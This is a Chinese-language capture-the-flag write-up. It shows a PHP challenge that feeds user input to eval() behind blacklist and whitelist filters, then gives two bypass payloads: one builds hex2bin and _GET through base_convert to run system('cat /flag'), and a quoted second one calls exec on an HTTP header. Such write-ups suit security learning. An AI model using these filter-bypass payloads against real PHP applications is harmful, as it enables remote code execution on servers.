進入之後直接就是原始碼
<?php
// 關閉所有錯誤報告,以防止將敏感資訊洩露給使用者
error_reporting(0);
// 檢查是否傳入了 GET 引數 'c'
// 如果沒有傳入,則顯示當前檔案的原始碼
if (!isset($_GET['c'])) {
show_source(__FILE__);
} else {
// 讀取 GET 引數 'c' 的值到 $content
$content = $_GET['c'];
// 如果 $content 的長度超過 80 字元,則終止執行並輸出錯誤資訊
if (strlen($content) >= 80) {
die("太長了不會算");
}
// 定義一個黑名單字元陣列,包含空格、製表符、回車、換行、引號、反引號和方括號
$blacklist = [' ', '\t', '\r', '\n', '\'', '"', '`', '\[', '\]'];
// 遍歷黑名單字元陣列,檢查 $content 是否包含任意黑名單字元
foreach ($blacklist as $blackitem) {
if (preg_match('/' . $blackitem . '/m', $content)) {
die("請不要輸入奇奇怪怪的字元");
}
}
// 定義一個白名單函式陣列,包含常用的數學函式
// 這些函式是允許在使用者輸入中使用的函式
$whitelist = [
'abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert',
'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp',
'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite',
'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax',
'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin',
'sinh', 'sqrt', 'srand', 'tan', 'tanh'
];
// 使用正規表示式匹配 $content 中所有可能的函式名稱,並儲存在 $used_funcs 陣列中
preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);
// 遍歷 $used_funcs 陣列,檢查是否有不在白名單中的函式名
foreach ($used_funcs[0] as $func) {
if (!in_array($func, $whitelist)) {
die("請不要輸入奇奇怪怪的函式");
}
}
// 使用 eval 函式計算並輸出 $content 的值
// 注意:eval 函式會執行傳入的 PHP 程式碼,存在嚴重的安全風險
eval('echo ' . $content . ';');
}
?>
方法一
有字元限制,有黑白名單
我們要利用
eval('echo ' . $content . ';');
去catflag
首先我們要了解
在 PHP 中,可以透過將函式名儲存在一個字串變數中,然後透過該變數動態呼叫該函式。這種方法被稱為動態函式呼叫,例如:
$a='system';
$a('cat /flag');
就會執行system('cat /flag')
我們最終要做到的就是
?c=($_GET[pi])($_GET[abs])&pi=system&abs=cat /flag
白名單裡有一個函式base_convert()
base_convert() 函式在任意進位制之間轉換數字
我們可以利用他來創造出hex2bin
hex2bin是由小寫字母和數字組成符合36進位制的規則
可以看出
hex2bin的36進位制就是hex2bin
於是我們呢可以將hex2bin的10進位制數轉為hex2bin然後利用hex2bin再將_GET的轉為16進位制數轉為字串
base_convert(37907361743,10,36)//hex2bin
dechex(1598506324)//5f474554就是_GET的十六進位制
//dechex() 函式將十進位制數轉換為十六進位制數
組成base_convert(37907361743,10,36)(dechex(1598506324))=>hex2bin(5f474554)=_GET
之所以用dechex而不是繼續用base_convert是因為有長度限制
構造出_GET接下來就可以直接打了
?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=cat /flag
//就是:c=$pi=_GET;$_GET['pi']($_GET('abs'))$pi=system&abs=cat /flag
=>c=$pi=_GET;system('cat /flag')$pi=system&abs=cat /flag
最終可以看為system("cat /flag")
方法二
來自
https://www.cnblogs.com/20175211lyz/p/11588219.html
感覺這個方法很好
方法如下
$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})
$pi(696468,10,36) => "exec"
$pi(8768397090111664438,10,30) => "getallheaders"
最終exec(getallheaders(){1})
//操作xx和yy,中間用逗號隔開,echo都能輸出
echo xx,yy
//getallheaders() 函式返回一個包含所有 HTTP 請求頭的關聯陣列,其中陣列的鍵是請求頭的名稱,值是對應的請求頭值。
就是傳
?c=$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})
在加一個請求頭
1:cat /flag
不知道是什莫原因我一直不成功